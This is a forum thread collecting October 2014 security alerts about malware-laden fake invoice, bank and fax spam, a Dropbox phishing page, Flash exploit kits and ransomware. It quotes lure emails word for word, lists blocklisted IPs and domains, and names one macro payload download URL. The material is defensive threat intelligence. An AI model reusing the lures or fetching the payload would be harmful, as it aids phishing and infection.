Updated: 18 Oct 2014 - "... In this scam, messages included links to a -fake- Google Docs login page hosted on Google itself. We continue to see millions of phishing messages every day, and recently we saw a similar scam targeting Dropbox users. The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a -fake- Dropbox login page, hosted on Dropbox itself.
Fake Dropbox login page:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%201.png
The -fake- login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing. The page looks like the real Dropbox login page, but with one crucial difference. The scammers are interested in phishing for more than just Dropbox credentials; they have also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well. After clicking "Sign in," the user’s credentials are sent to a PHP script on a compromised Web server. Credentials are also submitted over SSL, which is critical for the attack's effectiveness. Without this, victims would see an unnerving security warning.
Security warning:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%202.jpg
Upon saving or emailing the user's credentials to the scammer, the PHP script simply -redirects- the user to the real Dropbox login page. Although the page itself is served over SSL, and credentials are sent using the protocol, some resources on the page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications. Symantec reported this phishing page to Dropbox and they immediately took the page down..."

:fear::fear: :mad:

FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/humber-merchants-group-industrial-invoices-word-doc-malware/
21 Oct 2014 - "An email pretending to come from 'Humber Merchants Group' ps [random number]@humbermerchants .co.uk with a word document attachment and the subject of 'Industrial Invoices' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Attached are accounting documents from Humber Merchants
Humber Merchants Group
Head Office:
Parkinson Avenue
Scunthorpe
North Lincolnshire
DN15 7JX
Tel: 01724 860331
Fax: 01724 281326 ...

21 October 2014: 15040BII3646501.doc - Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2471f4a0febbfede40f5d700553eb28d97519ac49454bcc79f0fb7383559198b/analysis/1413890645/
___

Fake Adobe Invoice Spam
- http://threattrack.tumblr.com/post/100594804508/adobe-invoice-spam
Oct 21, 2014 - "Subjects Seen:
Adobe Invoice
Typical e-mail details:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a62cae97486096c615aa19538d2b5ebb/tumblr_inline_ndt0qkAetU1r6pupn.png

Malicious File Name and MD5:
invoice.zip (CABA79FCEB5C9FEF222C89C423AA2485)
invoice.exe (29684FBB98C1883A7A08977CB23E90B6)

Tagged: Adobe, Wauchos
___

Fake Invoice SPAM - malware
- http://myonlinesecurity.co.uk/please-find-attached-pi-copies-invoice-malware/
21 Oct 2014 - "An email pretending to come from cato-chem .com < sales@ cato-chem .com > with a fake invoice has a subject of Please find attached PI copies of Invoice is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/cato-chem_fake-invoice.png

21 October 2014: proforma invoice.zip: Extracts to proforma invoice.exe
Current Virus total detections: 17/54*. This Please find attached PI copies of Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a barcode as the icon instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/331d8fbfd2eecd6141a0bc61d3091c1d7e0311a0d8b6c0a29e500052f99c1ac2/analysis/1413858604/
___

ThetaRay turns to maths to detect cyber threats
- http://www.reuters.com/article/2014/10/21/us-thetaray-cybersecurity-idUSKCN0IA1JV20141021
Oct 21, 2014 - "As businesses face a growing threat of cyber attacks, Israeli start-up ThetaRay is betting on maths to provide early detection, enabling the shutdown of systems before damage can be done. The year-old company's first investor was venture capital firm Jerusalem Venture Partners. It is now also backed by heavyweights like General Electric, which uses ThetaRay to protect critical infrastructure such as power plants, and Israel's biggest bank, Hapoalim, which deployed the technology to detect bank account anomalies... Cyber security providers are moving away from protecting gateways with defenses such as firewalls to focus on detecting and preventing attacks before they penetrate organizations... Security experts estimate it can take more than -200- days to identify a cyber attack once it's been launched... Once a threat has been detected, ThetaRay leaves it up to humans to decide whether or not to shut down the system..."

:mad: :fear:

FYI...

Fake Debt Recovery SPAM - PDF malware
- http://myonlinesecurity.co.uk/bd-digital-supplies-commercial-debt-recovery-fake-pdf-malware/
22 Oct 2014 - "An email coming from random senders pretending to be B&D Digital Supplies or B&D Computers which is all about debt recovery and threatening legal action with a subject of 'Commercial Debt Recovery' , Ref No: [ random numbers]is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/commercial-debt-recovery.png

Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___

Fake customer service SPAM - doc malware
- http://myonlinesecurity.co.uk/customer-service-word-doc-malware/
22 Oct 2014 - "an email pretending to have a word document invoice attachment with a subject of Reference: [random characters] coming from [random name] 'customer service' at an unspecified company is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:

This email contains an invoice file attachment ID:VZY563200VA
Thanks!
Kelli Horn .

22 October 2014: ENC094126XJ.doc - Current Virus total detections: 0/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/d328ceac71beead36034d6f74671a84c197cf2fa9e2155885aa720363045eb0e/analysis/1413973355/
___

Fake Malformed or infected word docs with embedded macro viruses
- http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
22 Oct 2014 - "We are seeing loads of emails with Malformed or infected word docs with embedded macro viruses they are what appears to be a genuine word doc attached which is malformed and contains a macro or vba script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. Opening this malicious word document will infect you if Macros are enabled and simply previewing it in windows explorer or your email client might well be enough to infect you... Do -not- open word docs received in an email without scanning them with your antivirus first and be aware that there are a lot of dodgy word docs spreading that WILL infect you with no action from you if you are still using an outdated or vulnerable version of word. This is a good reason to update your office programs to a recent version and stop using office 2003 and 2007. The risks in using older version are starting to outweigh the convenience, benefits and cost of keeping an old version going... All modern versions of word and other office programs, that is 2010, 2013 and 365, should open word docs, excel files and PowerPoint etc that are downloaded from the web or received in an email automatically in “protected view” that stops any embedded malware or macros from being displayed and running. Make sure protected view is set in all office programs to protect you and your company from these sorts of attacks..."

- http://blog.dynamoo.com/2014/10/this-email-contains-invoice-file.html
22 Oct 2014
Screenshot: https://3.bp.blogspot.com/-1zwDnotABo4/VEeoiHJ74iI/AAAAAAAAF3Y/mKs9rkfW_oY/s1600/image1.gif
VT1: https://www.virustotal.com/en-gb/file/992fefe6c60d93693be7790a03880cc39a6cc7eb197c8e28bafd53c5ebbfe638/analysis/1413981604/
... Behavioural information
DNS requests
VBOXSVR.ovh.net: 213.186.33.6: https://www.virustotal.com/en-gb/ip-address/213.186.33.6/information/
TCP connections
178.250.243.114: https://www.virustotal.com/en-gb/ip-address/178.250.243.114/information/
91.240.238.51: https://www.virustotal.com/en-gb/ip-address/91.240.238.51/information/
VT2: https://www.virustotal.com/en-gb/file/73602b79321bc8190aed0aa9dd8ea0ef8997a37e92a64932ec258cb1b74f0788/analysis/1413982865/
___

Fake Wells Fargo SPAM – PDF malware
- http://myonlinesecurity.co.uk/wells-fargo-new-secure-message-fake-pdf-malware/
22 Oct 2014 - "An email pretending to come from Wells Fargo with a subject of 'You have a new Secure Message' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a secure message
Read your secure message by download AccountDocuments-10345.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting...

22 October 2014: document_013982_pdf.zip: Extracts to: document_013982_pdf.exe
Current Virus total detections: 5/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/de18e69c371dbd2f684e2dbcb40fa768c5ed8739182e75f4be90d81907e9e247/analysis/1413986180/
... Behavioural information
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
82.98.161.71: https://www.virustotal.com/en-gb/ip-address/82.98.161.71/information/
188.165.237.144: https://www.virustotal.com/en-gb/ip-address/188.165.237.144/information/
80.157.151.17: https://www.virustotal.com/en-gb/ip-address/80.157.151.17/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en-gb/ip-address/173.194.71.127/information/
___

Flash Player exploit in-the-wild - CVE-2014-0569
- https://blog.malwarebytes.org/exploits-2/2014/10/cyber-criminals-quickly-adopt-critical-flash-player-vulnerability/
Oct 22, 2014 - "... less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569*) was patched and made public:
* https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
The vulnerability had been privately reported to Adobe through the Zero Day Initiative group giving the firm the time to fix the issue before it became known to the world. Typically security researchers and criminals will be very attentive to such news and skilled reverse engineers will start looking at the patch to be able to reconstruct the exploit. All things considered, there is normally a certain amount of time before a proof of concept is released and then a little more time before that poc is weaponized by the bad guys... Kafeinee**... stumbled upon that same CVE in a real world exploit kit (Fiesta EK) only one -week- after the official security bulletin had been published... That means we have less and less time to deploy and test security patches. Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications. In any case, this was our first chance to test CVE-2014-0569 in the wild by triggering the Fiesta EK against Malwarebytes Anti-Exploit:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/FiestaCVE-2014-0569.png
It is crucial to patch any system running outdated Flash Player versions as soon as possible! You can check the version you are running (make sure to do this in all the browsers you use) by going here:
>> http://www.adobe.com/software/flash/about/
The bad guys are not going to run short of vulnerabilities they can weaponize at a quicker rate than ever before. This leaves end-users with very little room for mistakes such as failing to diligently apply security patches -sooner- rather than later..."
** http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html

> https://blog.malwarebytes.org/tag/fiesta-ek/

:mad: :fear:

FYI...

Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This fake Order Confirmation spam pretends to come from supertouch.com / Allied International Trading Limited but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...

In the sample I received, the attachment was -corrupt- but should have been a file a malicious Word document S-CON-A248-194387.doc. The document and payload is exactly the same as the one being sent out today with this spam run[1] (read that post for more details) and is very poorly detected, although blocking access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "

1] http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html

62.75.182.94: https://www.virustotal.com/en/ip-address/62.75.182.94/information/
___

Fake 'bank detail' SPAM - trojan
- http://blog.mxlab.eu/2014/10/23/fake-email-regarding-bitstamp-new-banking-details-contains-trojan/
Oct 23, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “New bank details”. This email is sent from the spoofed address “”Bitstamp .net” <no_reply@ bitstamp .net>”, while the real SMTP sender is AmericanExpress@ welcome .aexp .com, and has the following body:
New banking details
Dear Bitstamp clients,
We would like to inform you that Bitstamp now has new bank details, please check attached file.
We would like to assure those of you who sent deposits to our old details that our old IBAN is still active and your transfers, if otherwise sent with correct information, should arrive without a problem.
Please note that SEPA transfers usually take 1 to 3 business days to arrive and would kindly ask those waiting for your SEPA transfers longer than usually to please send us a transfer confirmation so that we can examine our bank account log and locate your transfers.
Also for those waiting on deposits we ask for your patience; we have accumulated a long list of transfers which lack information or contain wrong information which means we need to manually go through all of them instead of our system sorting them automatically.
Best regards
CEO, Nejc Kodrič
Bitstamp LIMITED

The attached ZIP file has the name bank details.zip and contains the 24 kB large file bank details.scr. The trojan is known as Troj.W32.Gen, a variant of Win32/Kryptik.COEK, HEUR/QVM20.1.Malware.Gen or Mal/Generic-S. At the time of writing, 4 of the 53 AV engines did detect the trojan at Virus Total*. Now, MX Lab has also intercepted some emails -without- the malicious attachment but be aware that this email is a risk..."
* https://www.virustotal.com/en/file/83fc76ba29762e28fc80c08085003b811a1fa3eae51635f99ff35b4022fd1769/analysis/1414073432/
... Behavioural information
DNS requests
VBOXSVR. ovh .net: 213.186.33.6: https://www.virustotal.com/en/ip-address/213.186.33.6/information/
___

Two exploit kits prey on Flash Player flaw patched only last week
- http://net-security.org/malware_news.php?id=2892
23.10.2014 - "Two exploit kits prey on Flash Player flaw patched only last week... The integer overflow vulnerability in question (CVE-2014-0569*) can allow attackers to execute arbitrary code via unspecified vectors, and is deemed critical (high impact, easily exploitable)... the time period was very short, and technical information about the vulnerability and exploit code hasn't yet been shared online... The exploit kits are used to deliver the usual assortment of malware, and some of the variants have an extremely low detection rate... If you use Adobe Flash Player, and you haven't implemented the latest patches, now would be a good time to rectify that mistake."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0569 - 10.0

- http://atlas.arbor.net/briefs/index#1049793989
Elevated Severity
23 Oct 2014

- http://www.securitytracker.com/id/1031019
CVE Reference: CVE-2014-0558, CVE-2014-0564, CVE-2014-0569
Oct 14 2014
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Solution: The vendor has issued a fix (13.0.0.250 extended support release, 15.0.0.189 for Windows/Mac, 11.2.202.411 for Linux)...
Flash 15.0.0.189 released: https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
Oct 14, 2014

For I/E: http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_active_x.exe

For Firefox (Plugin-based browsers): http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_plugin.exe

Flash test site: http://www.adobe.com/software/flash/about/
___

Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This -fake- Order Confirmation spam pretends to come from supertouch .com / Allied International Trading Limited - but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...

In the sample I received, the attachment was corrupt but should have been a file a malicious Word document S-CON-A248-194387.doc. The document and payload is exactly the same as the one being sent out today with this spam run* (read that post for more details) and is very poorly detected, although -blocking- access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "
* http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html
___

Fake VoiceMail SPAM
- http://blog.dynamoo.com/2014/10/voice-mail-voicemailsendervoicemailcom.html
23 Oct 2014 - "Before you open something like this.. think if you really get voice mail notifications through your email. No? Well, -don't- open it.
From: "Voice Mail" [voicemail_sender@ voicemail .com]
Date: Thu, 23 Oct 2014 14:31:22 +0200
Subject: voice message from 598-978-8974 for mailbox 833
You have received a voice mail message from 598-978-8974
Message length is 00:00:33. Message size is 264 KB.
Download your voicemail message from dropbox service below (Google Disk
Drive Inc.) ...

Clicking the link goes to a script that detects if the visitor is running Windows, if so it downloads a file doc_9231-92_pdf.zip from the target system which in turn contains a malicious executable doc_9231-92_pdf.exe which has a VirusTotal detection rate of 4/51*... 188.165.214.6 is rather unsurprisingly allocated to OVH France. It also drops a couple of executables onto the system... Recommended blocklist:
188.165.214.6
inaturfag .com "
* https://www.virustotal.com/en-gb/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414075720/
___

Fake BoA SPAM – PDF malware
- http://myonlinesecurity.co.uk/mamie-french-bank-america-unknown-incoming-wire-fake-pdf-malware/
23 Oct 2014 - "'Mamie French Bank of America Unknown incoming wire' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The banking activity with today’s posting date shows Electronic Fund Transfer (EFT) that has been received. Our bank has noted the following information:
EFT Amount: $ 6,200.00
Remitted From: SSA TREAS 310 MISC PAY
Designated for: UNKNOWN
Please download and open attachment with full imformation about this Electronic Fund Transfer payment.
If you confirm that it belongs to your agency or department, please email back or give us a call. Then, our office needs to receive a completed General Deposit no later than 10:00 a.m. tomorrow.
Note: If these funds cannot be identified or if no one claims this EFT, we are required to process the return of this EFT by 10:00 a.m., June 24, 2014.
Thank you.
Mamie French
Senior Accountant
Bank of America ...

23 October 2014: electronic_fund_transfer.zip: Extracts to: electronic_fund_transfer.scr
Current Virus total detections: 10/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414081814/

:fear: :mad:

FYI...

Fake Invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/invoice-8014042-october-word-doc-malware/
24 Oct 2014 - "'invoice 8014042 October' pretending to come from Sandra Lynch with a malformed word doc attachment containing a macro virus is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8014042 Account No 5608014042.
Thanks very much
Kind Regards
Sandra Lynch

24 October 2014: invoice_8014042.doc : Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/9659be0ec03fafcea7200032cdf3434ba14c99b9a8e0c3a16f5419d3817c48de/analysis/1414141144/
___

Fake Fax SPAM.. again.
- http://blog.dynamoo.com/2014/10/youve-received-new-fax-spam-again.html
24 Oct 2014 - "Another day, another -fake- fax spam.
From: Fax [fax@ victimdomain .com]
To: luke.sanson@ victimdomain .com
Date: 24 October 2014 10:54
Subject: You've received a new fax
New fax at SCAN2383840 from EPSON by https://victimdomain.com
Scan date: Fri, 24 Oct 2014 15:24:22 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(eFax Drive is a file hosting service operated by J2, Inc.)

The link in the email goes to a script which (if the the browser settings are correct) downloads a file document_92714-872_pdf.zip which in turn contains a malicious executable document_92714-872_pdf.exe which has a VirusTotal detection rate of 3/54*... The malware also drops two executables on the system, kcotk.exe (VT 0/53**...) and ptoma.exe (VT 2/51***...)... Recommended blocklist:
188.165.214.6
rodgersmith .com "
* https://www.virustotal.com/en/file/d9f637e2750f01b7d07451b4262a5d560ef2b5743db0a26881c4ebbd9e04373f/analysis/1414145184/

** https://www.virustotal.com/en-gb/file/8483369c80851bb2ecbf221b9d4c01dbd2980b7d3eb3c5829eccad62bef80651/analysis/1414145764/

*** https://www.virustotal.com/en-gb/file/b4798bbf747180a96b476af6adf167bd62e5c8b5d92b0c994e8a42a45c3bd19e/analysis/1414145784/
___

Widespread malvertising - delivered ransomware
- http://net-security.org/malware_news.php?id=2894
24.10.2014 - "A newer version of the Cryptowall ransomware has been delivered to unsuspecting Internet users via malicious ads shown on a considerable number of high-profile websites, including properties in the Yahoo, Match.com, and AOL domains. According to Proofpoint's calculations*, the malvertising campaign started in late September, picked up the pace this month, and lasted until October 18 and likely even a bit longer... In this campaign, the attackers used already existing ads for legitimate products, and submitted it to at least three major ad network members (Rubicon Project, Right Media/Yahoo Advertising, and OpenX). Visitors to the sites that ended up serving the malicious ads were automatically infected with the ransomware if they used software with vulnerabilities exploitable by the FlashPack Exploit Kit. The ransomware then encrypted the victims' hard drive and asks for money in return for the decryption key. Unfortunately, even if the ransom is paid, there is no guarantee that the victim will actually receive the key. The ransom is supposed to be paid in Bitcoin, and the addresses the criminals used for this purpose are C&C server-generated and many... This particular campaign now seems to be over - all the affected parties (optimizers and ad networks) have been notified, and the malicious ads pulled. Still, that doesn't mean that the attackers have not switched to spreading CryptoWall 2.0 via other means..."
* http://www.proofpoint.com/threatinsight/posts/malware-in-ad-networks-infects-visitors-and-jeopardizes-brands.php
___

Ebola-themed emails deliver malware, exploit Sandworm vulnerability (MS14-060)
- http://net-security.org/malware_news.php?id=2895
24.10.2014 - "US CERT has recently issued a warning* about malware-delivery campaigns using users' fear of the Ebola virus and its spreading as a bait. One of the most prolific campaigns is the one that -impersonates- the World Health Organization:
> http://www.net-security.org/images/articles/who-spam-24102014.jpg
The emails in question initially -linked- to the -malware- a variant of the DarkKomet RAT tool, used by attackers to access and control the victim's computer remotely and steal information. After a while, the attackers began to attach the malware directly to the message, as access to the malicious file hosted on a popular cloud data storage service was blocked quickly by service administrators, noted Tatyana Shcherbakova:
> https://securelist.com/blog/spam-test/67344/a-false-choice-the-ebola-virus-or-malware/
According to Websense researchers**, Ebola-themed malicious emails and documents are also being used by attackers taking advantage of the recently discovered Sandworm vulnerability (CVE-2014-4114***)..."
* https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014
** http://community.websense.com/blogs/securitylabs/archive/2014/10/23/Ebola-Spreads-_2D00_-In-Cyber-Attacks-Too.aspx
*** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114 - 9.3 (HIGH)
___

Phalling for the phish...
- http://blog.dynamoo.com/2014/10/do-people-really-fall-for-this.html
24 Oct 2014 - "... a simple phishing spam..
From: info@ kythea .gr
Date: 24 October 2014 13:50
Subject: payment
this mail is to inform you that the payment have been made
see the attached file for the payment slip
ANTON ARMAS

Attached is a file payment Slip (2).html which displays a popup alert:
You have been signed out of this account this may have happened automatically cause the attachement needs authentication. to continue using this account, you will need to sign in again. this is done to protect your account and to ensure the privacy of your information

The victim then gets sent to a phishing page, in this case at uere.bplaced .net/blasted/tozaiboeki.webmail .html which looks like this..
> https://4.bp.blogspot.com/-dliSNtwDjPk/VEpWNYc6hyI/AAAAAAAAF48/S74-pPcyPuI/s1600/multiphish.jpg
... do people really fall for this? The frightening answer is.. probably, yes."

bplaced .net: 5.9.107.19: https://www.virustotal.com/en/ip-address/5.9.107.19/information/

:mad: :fear:

FYI...

Fake 'New order' SPAM - malware
- http://myonlinesecurity.co.uk/daniela-lederer-re-new-order-malware/
25 Oct2014 - "'Daniela Lederer Re: New Order' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Daniela-Lederer-new-order.png

25 October 2014: J2134457863.zip: Extracts to: J2134457863.exe
Current Virus total detections: 14/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/e5b881143bd10304d8211fc4f2708839361cab6af59934d327150bcb0d098e86/analysis/1414216443/

:fear: :mad:

FYI...

Fake KLM e-Ticket SPAM – PDF malware
- http://myonlinesecurity.co.uk/klm-e-ticket-fake-pdf-malware/
27 Oct 2014 - "'KLM e-Ticket' pretending to come from e-service @klm .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/klm_air_ticket.png

27 October 2014: e-Ticket_klm_Itinerary _pdf.zip: Extracts to: e-Ticket_klm_Itinerary _pdf.exe
Current Virus total detections: 2/53* . This 'KLM e-Ticket' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0a28086129c3e01e37868532f79cd72acb21d88443fb0a377b3b8a3c184ad88/analysis/1414404573/
___

Fake 'invoice xxxxxx October' SPAM - malicious Word doc
- http://blog.dynamoo.com/2014/10/randomly-generated-invoice-xxxxxx.html
27 Oct 2014 - "There have been a lot of these today:
From: Sandra Lynch
Date: 27 October 2014 12:29
Subject: invoice 0544422 October
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 0544422 Account No 5600544422.
Thanks very much
Kind Regards
Sandra Lynch

The numbers in the email are randomly generated, as is the filename of the attachment (in this example it was invoice_0544422.doc). The document itself is malicious and has a VirusTotal detection rate of 5/53*. Inside the Word document is a macro that attempts to download an execute a malicious binary from http ://centrumvooryoga .nl/docs/bin.exe which is currently 404ing which is a good sign. There's a fair chance that the spammers will use this format again, so always be cautious of unsolicited email attachments."
* https://www.virustotal.com/en/file/7dcc2db732fc3c3c8bfbee2539644c8fbc19648d6b82c2fd35bc3a513cd059e6/analysis/1414436717/

83.96.174.219: https://www.virustotal.com/en/ip-address/83.96.174.219/information/
___

Phish... linked with “Dyre” Banking Malware
- https://www.us-cert.gov/ncas/alerts/TA14-300A
Oct 27, 2014 - "Systems Affected: Microsoft Windows. Overview:
Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payloads... Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware... The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors... Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in -unpatched- versions of Adobe Reader... After successful exploitation, a user's system will download Dyre banking malware..."
___

FTC gets courts to shut down tech support scammers
- http://www.theinquirer.net/inquirer/news/2377916/us-ftc-gets-courts-to-shut-down-tech-support-scammers
Oct 27 2014 - "... the company, which called itself PairSys, would call people at home and claim to be from Microsoft or Facebook. This is a common scam, and the caller will often claim that the victim has a PC-based problem. In some cases people fall for this. It is estimated that PairSys made $2.5m from the scam and that it employed online adverts as well as phone calls as lures. "The defendants behind Pairsys targeted seniors and other vulnerable populations, preying on their lack of computer knowledge to sell ‘security' software and programs that had no value at all," said Jessica Rich, director of the FTC's Bureau of Consumer Protection... The defendants in the case, Pairsys, Uttam Saha and Tiya Bhattacharya, have agreed to the terms of a preliminary injunction, which includes an instruction to shut down their websites and telephone lines and not to sell on their customer data lists."
* http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam

> http://www.consumer.ftc.gov/blog

:fear: :mad:

FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
28 Oct 2014 - "An email saying 'Please find attached INVOICE number 224244 from Power EC Ltd' pretending to come from soo.sutton[random number]@ powercentre .com with a subject of 'INVOICE [random number] from Power EC Ltd' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please find attached INVOICE number 224244 from Power EC Ltd

28 October 2014 : INVOICE263795.doc - Current Virus total detections: 3/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... macro malware**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414506485/

** http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/

- http://blog.dynamoo.com/2014/10/invoice-101760-from-power-ec-ltd-spam.html
28 Oct 2014
> https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414519923/
Recommended blocklist:
62.75.184.70: https://www.virustotal.com/en/ip-address/62.75.184.70/information/
116.48.157.176: https://www.virustotal.com/en/ip-address/116.48.157.176/information/
___

Fake 'Ebola Alert Tool' ...
- https://blog.malwarebytes.org/online-security/2014/10/new-online-ebola-alert-tool-is-anything-but/
